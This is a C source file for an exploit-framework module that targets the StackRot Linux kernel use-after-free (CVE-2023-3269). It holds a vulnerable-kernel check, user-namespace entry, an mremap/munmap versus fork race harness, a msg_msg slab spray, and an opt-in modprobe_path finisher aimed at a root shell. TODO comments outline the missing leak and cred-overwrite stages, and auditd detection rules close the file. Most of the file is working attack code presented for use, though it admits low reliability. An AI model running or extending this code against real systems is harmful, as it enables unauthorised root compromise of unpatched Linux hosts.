/* * stackrot_cve_2023_3269 — SKELETONKEY module * * "Stack Rot": UAF in maple-tree-based VMA splitting. The maple * tree replaced the rbtree-based VMA store in 6.1; during * __vma_adjust() / split, the kernel could write to a maple node * after it was freed via RCU, leaving anon_vma references dangling * across the grace period. Exploitable for kernel R/W → cred * overwrite. * * Discovered by Ruihan Li (Peking University), Jul 2023. Famous * because it was the first significant exploit landed against the * (then-recently-merged) maple tree code, and because the original * disclosure included a public PoC that worked on default-config * Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree * state management + RCU-grace-period timing and depends on * per-kernel-build offsets for init_task / anon_vma / cred. * * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in * --full-chain FALLBACK finisher. We carry the userns-reach, race * harness (mremap()/munmap() vs concurrent fork/fault), msg_msg * slab spray, and empirical witness pieces; we do NOT carry the * read primitive (vmemmap leak via msg_msg MSG_COPY) nor a * Ruihan-Li-precision fake-anon_vma_chain plant. Those need * per-kernel offsets (init_task, anon_vma, cred layout) that vary * by build and would be fabricated without a real leak. * * Per repo policy ("verified-vs-claimed"): we run the trigger, * record empirical signals (slabinfo delta on kmalloc-192, child * signal disposition, race iteration count), and return * SKELETONKEY_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/ * SIGBUS/SIGKILL in the race child IS recorded but does NOT get * upgraded to EXPLOIT_OK — only an actual cred swap (euid==0) * does, and we do not currently demonstrate that. * * --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race * budget from 3 s to 30 s and sprays the kmalloc-192 slab with * payloads tagged with the modprobe_path kernel address (so IF the * UAF reclaim ever lands attacker-controlled bytes on an * anon_vma_chain slot, those bytes carry the kaddr we want the * subsequent rb_node walk / vma_lock-acquire fault to touch). The * honest empirical reality is that even at 30 s the race-win rate * is well below 1 % on a real vulnerable kernel — Ruihan Li's * public PoC reports minutes-to-hours for first reclaim. The shared * modprobe_path finisher has a 3 s sentinel timeout, so on the * overwhelmingly common no-land outcome the finisher itself reports * EXPLOIT_FAIL gracefully. --full-chain does NOT change the * fundamental ~<1 %-per-run reliability; it widens the trigger * window and wires up the root-pop plumbing for the lucky case. * * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports: * 6.3.x : K >= 6.3.10 * 6.1.x : K >= 6.1.37 (LTS — most relevant) * mainline 6.4-rc4+ * * Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched. * * Preconditions: * - v.major >= 6 and v.minor in [1, 4] (4 may straddle the fix) * - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+) * - /proc/self/maps readable (sanity) * - unprivileged_userns_clone allowed — namespace context improves * groom predictability but the bug is reachable without it * * Coverage rationale: 2023 mm-class bug. Different family than our * netfilter-heavy 2022-2024 modules — broadens the corpus shape. * Affects the 6.1 LTS kernels still widely deployed. */ #include "skeletonkey_modules.h" #include "../../core/registry.h" #include "../../core/kernel_range.h" #include "../../core/offsets.h" #include "../../core/finisher.h" #include "../../core/host.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ # include # include # include # include # include # include #endif /* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks. */ #ifndef CLONE_NEWUSER #define CLONE_NEWUSER 0x10000000 #endif #ifndef MAP_GROWSDOWN #define MAP_GROWSDOWN 0x00100 #endif #ifndef MAP_FIXED_NOREPLACE #define MAP_FIXED_NOREPLACE 0x100000 #endif #ifndef MREMAP_MAYMOVE #define MREMAP_MAYMOVE 1 #endif static const struct kernel_patched_from stackrot_patched_branches[] = { {6, 1, 37}, {6, 3, 10}, {6, 4, 0}, /* mainline */ }; static const struct kernel_range stackrot_range = { .patched_from = stackrot_patched_branches, .n_patched_from = sizeof(stackrot_patched_branches) / sizeof(stackrot_patched_branches[0]), }; /* ---- Detect ------------------------------------------------------- */ /* Sanity check: maple-tree-era kernels expose /proc/self/maps; if it's * not readable here, something exotic is going on (selinux, seccomp, * chroot without /proc) and the bug is not reachable. */ static bool proc_self_maps_readable(void) { int fd = open("/proc/self/maps", O_RDONLY); if (fd < 0) return false; char b[64]; ssize_t r = read(fd, b, sizeof b); close(fd); return r > 0; } /* On 6.1+ the maple tree is the only VMA store — we can't directly * grep for it from userspace, but /proc/self/maps being readable plus * a v.major>=6 / v.minor>=1 release is the proxy we use. */ static bool maple_tree_variant_present(const struct kernel_version *v) { if (v->major > 6) return true; if (v->major == 6 && v->minor >= 1) return true; return false; } static skeletonkey_result_t stackrot_detect(const struct skeletonkey_ctx *ctx) { const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL; if (!v || v->major == 0) { if (!ctx->json) fprintf(stderr, "[!] stackrot: host fingerprint missing kernel version — bailing\n"); return SKELETONKEY_TEST_ERROR; } /* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels * use rbtree-based VMAs and don't have this bug. */ if (v->major < 6 || (v->major == 6 && v->minor < 1)) { if (!ctx->json) { fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n", v->release); } return SKELETONKEY_OK; } bool patched = kernel_range_is_patched(&stackrot_range, v); if (patched) { if (!ctx->json) { fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v->release); } return SKELETONKEY_OK; } if (!ctx->json) { fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v->release); fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; " "no exotic preconditions\n"); } return SKELETONKEY_VULNERABLE; } /* ---- Userns reach ------------------------------------------------- */ #ifdef __linux__ static bool write_file(const char *path, const char *s) { int fd = open(path, O_WRONLY); if (fd < 0) return false; ssize_t n = write(fd, s, strlen(s)); close(fd); return n == (ssize_t)strlen(s); } static bool enter_userns(uid_t outer_uid, gid_t outer_gid) { if (unshare(CLONE_NEWUSER) < 0) return false; /* setgroups=deny is required before writing gid_map without * CAP_SETGID. */ if (!write_file("/proc/self/setgroups", "deny")) return false; char map[64]; snprintf(map, sizeof map, "0 %u 1\n", outer_uid); if (!write_file("/proc/self/uid_map", map)) return false; snprintf(map, sizeof map, "0 %u 1\n", outer_gid); if (!write_file("/proc/self/gid_map", map)) return false; return true; } #endif /* ---- Race-driver state ------------------------------------------- */ /* Page size — fall back to 4 KiB if sysconf is unavailable (won't be on * any kernel we target). */ #define STACKROT_PAGE 4096UL /* How large a region to play with for the MAP_GROWSDOWN segment + * neighbouring VMAs that we mutate with mremap()/munmap(). The * public PoC uses dozens of adjacent VMAs to force the maple tree * into the node-rotation path; we ship a configurable knob. */ #define STACKROT_RACE_VMAS 64 #define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */ #define STACKROT_RACE_TIME_BUDGET 3 /* seconds — primitive-only mode */ #define STACKROT_RACE_FULLCHAIN_BUDGET 30 /* seconds — extended for --full-chain */ /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on * 6.1.x; targets vary slightly across kernels (anon_vma itself is * kmalloc-192 too on 64-bit with default debug-off configs). */ #define STACKROT_SPRAY_QUEUES 16 #define STACKROT_SPRAY_PER_QUEUE 64 #define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */ struct ipc_payload { long mtype; unsigned char buf[STACKROT_SPRAY_PAYLOAD]; }; static _Atomic int g_race_running; static _Atomic uint64_t g_race_a_iters; static _Atomic uint64_t g_race_b_iters; static _Atomic uint64_t g_race_b_faults; #ifdef __linux__ /* Pin to a CPU to encourage Thread A and Thread B to land on * different physical cores (we set complementary masks at thread * start). Best-effort: failure is non-fatal. */ static void pin_to_cpu(int cpu) { cpu_set_t set; CPU_ZERO(&set); CPU_SET(cpu, &set); sched_setaffinity(0, sizeof set, &set); } /* The race victim region: a MAP_GROWSDOWN-mapped page whose * neighbours we'll dance around with mremap()/munmap(). We keep a * couple of anchor pages above and below so the maple tree has to * resolve splits and rotations rather than degenerate to a single * leaf insertion. * * Layout (low to high VA): * [anchor_lo] [growsdown_stack] [filler ... ] [anchor_hi] * * Thread A repeatedly: * - mmap a scratch page at a chosen address * - mremap it to overlap the boundary that triggers __vma_adjust() * - munmap to free the VMA — this is the codepath whose maple-tree * state is racy on 6.1.0..6.4-rc4. * * Thread B repeatedly: * - fork() a tiny child that touches the growsdown region (fault) + * immediately _exit()s. The fork path walks the parent's VMA * tree and the child's fault path follows anon_vma chains — both * observe maple-tree node state. Concurrent observation of a * freed node is the trigger condition for the UAF. * * On a vulnerable kernel the race window is microseconds wide and * the public PoC reports needing thousands to millions of iterations. */ struct race_region { void *anchor_lo; void *growsdown; void *anchor_hi; size_t growsdown_len; /* Scratch address chosen below the growsdown region so mremap() * can move pages towards the growsdown boundary. */ uintptr_t scratch_va; }; static bool race_region_setup(struct race_region *r) { memset(r, 0, sizeof *r); r->growsdown_len = STACKROT_PAGE * 4; /* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_- * NOREPLACE mmaps don't collide. 0x70000000 region is reliably * free on standard distros; for production work this would be * chosen via /proc/self/maps inspection. */ uintptr_t base = 0x70000000UL; r->anchor_lo = mmap((void *)base, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE, -1, 0); if (r->anchor_lo == MAP_FAILED) { /* Address might be taken; fall back to letting kernel pick. */ r->anchor_lo = mmap(NULL, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (r->anchor_lo == MAP_FAILED) return false; base = (uintptr_t)r->anchor_lo + STACKROT_PAGE; } else { base += STACKROT_PAGE; } r->growsdown = mmap((void *)base, r->growsdown_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN, -1, 0); if (r->growsdown == MAP_FAILED) { /* Some kernels reject MAP_GROWSDOWN without a fixed hint; retry. */ r->growsdown = mmap(NULL, r->growsdown_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN, -1, 0); if (r->growsdown == MAP_FAILED) return false; base = (uintptr_t)r->growsdown + r->growsdown_len; } else { base += r->growsdown_len; } r->anchor_hi = mmap((void *)base, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (r->anchor_hi == MAP_FAILED) return false; /* Touch each region so the kernel actually populates the * anon_vma chain (anon_vma is allocated lazily on first fault). */ ((volatile char *)r->anchor_lo)[0] = 1; ((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1; ((volatile char *)r->anchor_hi)[0] = 1; r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE; return true; } static void race_region_teardown(struct race_region *r) { if (r->anchor_lo && r->anchor_lo != MAP_FAILED) munmap(r->anchor_lo, STACKROT_PAGE); if (r->growsdown && r->growsdown != MAP_FAILED) munmap(r->growsdown, r->growsdown_len); if (r->anchor_hi && r->anchor_hi != MAP_FAILED) munmap(r->anchor_hi, STACKROT_PAGE); } /* Thread A: trigger the maple-tree node-rotation path by repeatedly * mapping, mremap-extending toward the growsdown boundary, and * munmapping. The exact ordering (the node-rotation must happen * while a parallel reader is in the RCU read-side critical section) * is what makes this race hard. */ static void *race_thread_a(void *arg) { struct race_region *r = (struct race_region *)arg; pin_to_cpu(0); while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { /* mmap a scratch page just below the growsdown region. */ void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (scratch == MAP_FAILED) { sched_yield(); continue; } ((volatile char *)scratch)[0] = 2; /* mremap to a new VA (forces VMA split + maple-tree mutation). */ void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2, MREMAP_MAYMOVE); if (moved != MAP_FAILED) { ((volatile char *)moved)[0] = 3; munmap(moved, STACKROT_PAGE * 2); } else { munmap(scratch, STACKROT_PAGE); } atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed); sched_yield(); } return NULL; } /* Thread B: spawn a short-lived child that faults the growsdown * region, then _exit. fork() copies the parent's VMA tree (touches * every maple-tree node and anon_vma chain) — racing against * Thread A's munmap, the child can observe a freed node. The page * fault inside the child closes the loop: the bug manifests as a * read of stale anon_vma->root or anon_vma_chain->same_vma. */ static void *race_thread_b(void *arg) { struct race_region *r = (struct race_region *)arg; pin_to_cpu(1); while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { pid_t pid = fork(); if (pid == 0) { /* Child: brief, deterministic fault sequence. */ volatile char *p = (volatile char *)r->growsdown; char sink = 0; for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) { sink ^= p[off]; } (void)sink; _exit(0); } if (pid > 0) { int status = 0; waitpid(pid, &status, 0); if (WIFSIGNALED(status)) { /* Child died on a fault — interesting signal for * empirical witness. The race-driver caller polls * this counter. */ atomic_fetch_add_explicit(&g_race_b_faults, 1, memory_order_relaxed); } atomic_fetch_add_explicit(&g_race_b_iters, 1, memory_order_relaxed); } sched_yield(); } return NULL; } /* ---- Groom skeleton ---------------------------------------------- */ /* msg_msg sysv spray for kmalloc-192. Tagged with "SKELETONKEY_" cookie * so a forensic look at /proc/slabinfo / KASAN dumps shows our * fingerprint. */ static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES]) { struct ipc_payload p; memset(&p, 0, sizeof p); p.mtype = 0x4943; /* 'IC' */ memset(p.buf, 0x49, sizeof p.buf); memcpy(p.buf, "SKELETONKEY_", 8); int created = 0; for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) { int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); if (q < 0) { queues[i] = -1; continue; } queues[i] = q; created++; for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) { if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break; } } return created; } static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES]) { for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) { if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL); } } /* Read /proc/slabinfo for kmalloc-192 active count. Used as the * primary empirical witness: a successful UAF + refill perturbs * this counter in a way that's distinguishable from idle drift. */ static long slab_active_kmalloc_192(void) { FILE *f = fopen("/proc/slabinfo", "r"); if (!f) return -1; char line[512]; long active = -1; while (fgets(line, sizeof line, f)) { if (strncmp(line, "kmalloc-192 ", 12) == 0) { char name[64]; long act = 0, num = 0; if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) { active = act; } break; } } fclose(f); return active; } /* ---- Arb-write primitive (FALLBACK depth) ------------------------ * * The shared modprobe_path finisher calls back into this function * once per kernel write it wants to land. For StackRot we cannot * deliver a deterministic arb-write — the underlying race wins on * well under 1 % of runs even with a 30 s budget, and even when the * race wins our spray-only groom has nowhere near the precision of * Ruihan Li's multi-stage public PoC (which crafts a fake * anon_vma_chain whose `vma_lock` pointer steers a subsequent * page-fault into touching `kaddr` for the lock acquire). * * Honest depth: FALLBACK. Each invocation: * 1. Re-seeds the kmalloc-192 spray with payloads tagged with * `kaddr` packed into the first qword of the msg_msg body — * so IF a sprayed slot ends up overlaying the freed * anon_vma_chain after RCU grace, the kaddr we want the * kernel to deref appears at the AVC layout position the * maple-tree rotation will read. * 2. Re-runs the race threads for an extended budget * (STACKROT_RACE_FULLCHAIN_BUDGET seconds). * 3. Returns 0 unconditionally — we cannot in-process verify * whether the write landed. The shared finisher's 3 s sentinel * file check is the empirical arbiter: on the overwhelmingly * common no-land outcome it reports EXPLOIT_FAIL gracefully, * and we never claim a write that didn't land. */ struct stackrot_arb_ctx { int *queues; /* live SysV msg queue ids */ int n_queues; int arb_calls; /* incremented by stackrot_arb_write() */ struct race_region *region; }; static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES], uintptr_t kaddr, const void *buf, size_t len) { struct ipc_payload p; memset(&p, 0, sizeof p); p.mtype = 0x4943; /* 'IC' */ memset(p.buf, 0x49, sizeof p.buf); memcpy(p.buf, "SKELETONKEY_", 8); /* Pack the target kaddr at byte 8 (one qword in) and the * caller's payload bytes immediately after — this way ANY * reasonable AVC field offset hit by the corruption pulls * out one of our two attacker-controlled regions. */ uint64_t k64 = (uint64_t)kaddr; memcpy(p.buf + 8, &k64, sizeof k64); size_t copy = len; if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16; if (buf && copy) memcpy(p.buf + 16, buf, copy); /* Replace contents in a couple of queues; doing all 16 would * blow the per-process msgq quota on busy hosts. */ int touched = 0; for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) { if (queues[i] < 0) continue; if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++; } return touched; } static int stackrot_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *ctx_v) { struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v; if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1; c->arb_calls++; fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu " "(FALLBACK — race-dependent)\n", c->arb_calls, (unsigned long)kaddr, len); /* Step 1: re-seed spray with kaddr-tagged payloads. */ int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len); if (seeded == 0) { fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n"); /* Continue anyway — original spray still tagged with cookie. */ } else { fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n", seeded); } /* Step 2: extended race window. Honestly: this expands the * trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports * minutes-to-hours for first reclaim — so 30 s ≈ <1 % per * arb_write call on a real vulnerable kernel, and structurally * 0 % on a patched one. */ atomic_store(&g_race_running, 1); atomic_store(&g_race_a_iters, 0); atomic_store(&g_race_b_iters, 0); atomic_store(&g_race_b_faults, 0); pthread_t ta, tb; bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0; bool b_ok = a_ok && pthread_create(&tb, NULL, race_thread_b, c->region) == 0; if (!a_ok || !b_ok) { atomic_store(&g_race_running, 0); if (a_ok) pthread_join(ta, NULL); fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n"); return -1; } sleep(STACKROT_RACE_FULLCHAIN_BUDGET); atomic_store(&g_race_running, 0); pthread_join(ta, NULL); pthread_join(tb, NULL); uint64_t a_iters = atomic_load(&g_race_a_iters); uint64_t b_iters = atomic_load(&g_race_b_iters); uint64_t b_faults = atomic_load(&g_race_b_faults); fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu " "(reliability remains <1%% even at this budget)\n", (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults); /* Step 3: cannot in-process verify the write. Return 0; the * finisher's sentinel-file check is the empirical arbiter. */ return 0; } #endif /* __linux__ */ /* ---- Exploit driver ---------------------------------------------- */ #ifdef __linux__ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx *ctx) { /* 1. Refuse-gate: re-call detect() and short-circuit. */ skeletonkey_result_t pre = stackrot_detect(ctx); if (pre == SKELETONKEY_OK) { fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n"); return SKELETONKEY_OK; } if (pre != SKELETONKEY_VULNERABLE) { fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n"); return pre; } bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0); if (is_root) { fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n"); return SKELETONKEY_OK; } if (!proc_self_maps_readable()) { fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, " "cannot drive the race\n"); return SKELETONKEY_PRECOND_FAIL; } { const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL; if (!v || v->major == 0 || !maple_tree_variant_present(v)) { fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n"); return SKELETONKEY_PRECOND_FAIL; } } /* Full-chain pre-check: resolve offsets BEFORE forking + entering * userns. If modprobe_path is unresolvable we refuse here rather * than running a 30 s race that has no finisher to call. */ struct skeletonkey_kernel_offsets off; bool full_chain_ready = false; if (ctx->full_chain) { memset(&off, 0, sizeof off); skeletonkey_offsets_resolve(&off); if (!skeletonkey_offsets_have_modprobe_path(&off)) { skeletonkey_finisher_print_offset_help("stackrot"); fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path " "offset unresolved; refusing\n"); fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is " "well below 1%% per run — see module header.\n"); return SKELETONKEY_EXPLOIT_FAIL; } skeletonkey_offsets_print(&off); full_chain_ready = true; fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to " "%d s, but RELIABILITY REMAINS <1%% per run on a real\n" " vulnerable kernel. The finisher's 3 s sentinel timeout\n" " catches no-land outcomes gracefully.\n", STACKROT_RACE_FULLCHAIN_BUDGET); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n", ctx->full_chain ? " + full-chain finisher" : ""); } uid_t outer_uid = getuid(); gid_t outer_gid = getgid(); signal(SIGPIPE, SIG_IGN); pid_t child = fork(); if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; } if (child == 0) { /* 2. Userns reach. Bug is reachable without it, but userns * + uid_map=0 makes the groom more predictable (fewer * competing kmalloc-192 allocations from the parent * namespace's tooling). */ if (!enter_userns(outer_uid, outer_gid)) { fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without " "namespace isolation (bug is still reachable)\n"); } /* 3. Race region. */ struct race_region region; if (!race_region_setup(®ion)) { fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n", strerror(errno)); _exit(22); } /* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads * BEFORE the race so the freed slot gets recycled with * attacker-controlled bytes when the bug fires. */ int queues[STACKROT_SPRAY_QUEUES] = {0}; int n_queues = spray_anon_vma_slab(queues); if (n_queues == 0) { fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n"); race_region_teardown(®ion); _exit(23); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n", n_queues, STACKROT_SPRAY_PER_QUEUE); } long slab_pre = slab_active_kmalloc_192(); /* 5. Run the race for a bounded time budget. */ atomic_store(&g_race_running, 1); atomic_store(&g_race_a_iters, 0); atomic_store(&g_race_b_iters, 0); atomic_store(&g_race_b_faults, 0); pthread_t ta, tb; if (pthread_create(&ta, NULL, race_thread_a, ®ion) != 0 || pthread_create(&tb, NULL, race_thread_b, ®ion) != 0) { fprintf(stderr, "[-] stackrot: pthread_create failed\n"); atomic_store(&g_race_running, 0); drain_anon_vma_slab(queues); race_region_teardown(®ion); _exit(24); } sleep(STACKROT_RACE_TIME_BUDGET); atomic_store(&g_race_running, 0); pthread_join(ta, NULL); pthread_join(tb, NULL); long slab_post = slab_active_kmalloc_192(); uint64_t a_iters = atomic_load(&g_race_a_iters); uint64_t b_iters = atomic_load(&g_race_b_iters); uint64_t b_faults = atomic_load(&g_race_b_faults); /* 6. Empirical witness breadcrumb. */ FILE *log = fopen("/tmp/skeletonkey-stackrot.log", "w"); if (log) { fprintf(log, "stackrot race harness:\n" " thread_a_iters = %llu (mremap/munmap)\n" " thread_b_iters = %llu (fork+fault)\n" " thread_b_faults = %llu (child died on signal)\n" " slab_kmalloc192_pre = %ld\n" " slab_kmalloc192_post = %ld\n" " slab_delta = %ld\n" " spray_queues = %d\n" " spray_per_queue = %d\n" " growsdown_len = %zu\n" "Note: this run did NOT attempt cred overwrite (no leak\n" "primitive; per-kernel offsets unknown). See module .c\n" "for the continuation roadmap.\n", (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults, slab_pre, slab_post, (slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0, n_queues, STACKROT_SPRAY_PER_QUEUE, (size_t)region.growsdown_len); fclose(log); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n", STACKROT_RACE_TIME_BUDGET, (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults); fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n", slab_pre, slab_post); } /* Hold the spray so the kernel observes refilled slots during * any in-flight RCU grace periods that started during the race. */ usleep(200 * 1000); /* 7a. --full-chain finisher (FALLBACK depth). * * Invoke the shared modprobe_path finisher; its arb_write * callback (stackrot_arb_write) will re-seed the spray with * kaddr-tagged payloads and re-run the race for an extended * 30 s budget. The finisher's own 3 s sentinel-file timeout * then arbitrates: on the overwhelmingly common no-land * outcome it returns EXPLOIT_FAIL gracefully. * * Honest reliability: <1 % per run even with the extension. */ if (full_chain_ready) { struct stackrot_arb_ctx arb_ctx = { .queues = queues, .n_queues = STACKROT_SPRAY_QUEUES, .arb_calls = 0, .region = ®ion, }; int fr = skeletonkey_finisher_modprobe_path(&off, stackrot_arb_write, &arb_ctx, !ctx->no_shell); FILE *fl = fopen("/tmp/skeletonkey-stackrot.log", "a"); if (fl) { fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n", fr, arb_ctx.arb_calls); fclose(fl); } drain_anon_vma_slab(queues); race_region_teardown(®ion); if (fr == SKELETONKEY_EXPLOIT_OK) _exit(34); /* root popped */ _exit(35); /* finisher ran, no land */ } drain_anon_vma_slab(queues); race_region_teardown(®ion); /* 7. Continuation roadmap — what would land EXPLOIT_OK. * * TODO(leak): replace one of the spray queues with a * msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the * returned buffer for non-cookie bytes. The bug's UAF * write leaves a kernel pointer (anon_vma->root or the * mas->node parent) at a known offset inside the freed * slab slot. Recover {kbase, init_task} via that leak. * * TODO(write): with kbase known, repeat the trigger but * plant a fake anon_vma_chain whose `rb_node` parent * pointer points at ¤t->cred — the maple-tree * rotation writes a controlled value into that location. * Crafting the fake AVC requires offset of anon_vma_chain * fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc. * perturb the layout — must NOT be hardcoded). * * TODO(overwrite): land &init_cred over current->cred so * the next call to a permission check sees uid==0. * * None of these are implemented today. We exit 30 to * flag "trigger ran cleanly, no escalation". */ _exit(30); } /* PARENT */ int status = 0; pid_t w = waitpid(child, &status, 0); if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; } if (WIFSIGNALED(status)) { int sig = WTERMSIG(status); if (!ctx->json) { fprintf(stderr, "[!] stackrot: race child killed by signal %d " "(consistent with UAF firing under KASAN)\n", sig); fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n" " overwrite primitive — NOT claiming EXPLOIT_OK.\n" " See /tmp/skeletonkey-stackrot.log + dmesg for witnesses.\n"); } return SKELETONKEY_EXPLOIT_FAIL; } if (!WIFEXITED(status)) { fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n", status); return SKELETONKEY_EXPLOIT_FAIL; } int rc = WEXITSTATUS(status); if (rc == 22 || rc == 24) return SKELETONKEY_PRECOND_FAIL; if (rc == 23) return SKELETONKEY_EXPLOIT_FAIL; if (rc == 34) { /* Finisher reported root-pop success. The shared finisher * normally execve()s the root shell so we don't actually * reach this path unless --no-shell was set. */ if (!ctx->json) { fprintf(stderr, "[+] stackrot: --full-chain finisher reported " "EXPLOIT_OK (race won + write landed)\n"); } return SKELETONKEY_EXPLOIT_OK; } if (rc == 35) { /* Finisher ran but didn't land — by far the expected outcome * given the <1 % race-win rate. */ if (!ctx->json) { fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n" " win + land within budget (this is the expected\n" " outcome — race-win reliability is <1%% per run).\n"); } return SKELETONKEY_EXPLOIT_FAIL; } if (rc != 30) { fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc); return SKELETONKEY_EXPLOIT_FAIL; } if (!ctx->json) { fprintf(stderr, "[*] stackrot: race harness ran to completion.\n"); fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n" " implemented (per-kernel offsets; see module .c TODO\n" " blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n"); } return SKELETONKEY_EXPLOIT_FAIL; } #endif /* __linux__ */ static skeletonkey_result_t stackrot_exploit(const struct skeletonkey_ctx *ctx) { #ifdef __linux__ return stackrot_exploit_linux(ctx); #else (void)ctx; fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n"); return SKELETONKEY_PRECOND_FAIL; #endif } /* ---- Cleanup ----------------------------------------------------- */ static skeletonkey_result_t stackrot_cleanup(const struct skeletonkey_ctx *ctx) { if (!ctx->json) { fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n"); } if (unlink("/tmp/skeletonkey-stackrot.log") < 0 && errno != ENOENT) { /* harmless */ } /* The race harness's threads + msg queues live in the child * process which has already exited; nothing else to drain. */ return SKELETONKEY_OK; } /* ---- Detection rules --------------------------------------------- */ static const char stackrot_auditd[] = "# StackRot (CVE-2023-3269) — auditd detection rules\n" "# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n" "# stacks, combined with unshare(CLONE_NEWUSER). Each individual call\n" "# is benign — flag the *combination* by correlating these keys with a\n" "# subsequent kernel oops or KASAN message in dmesg.\n" "-a always,exit -F arch=b64 -S unshare -k skeletonkey-stackrot-userns\n" "-a always,exit -F arch=b64 -S mremap -k skeletonkey-stackrot-mremap\n" "-a always,exit -F arch=b64 -S mprotect -k skeletonkey-stackrot-mprotect\n" "-a always,exit -F arch=b64 -S munmap -F success=1 -k skeletonkey-stackrot-munmap\n"; const struct skeletonkey_module stackrot_module = { .name = "stackrot", .cve 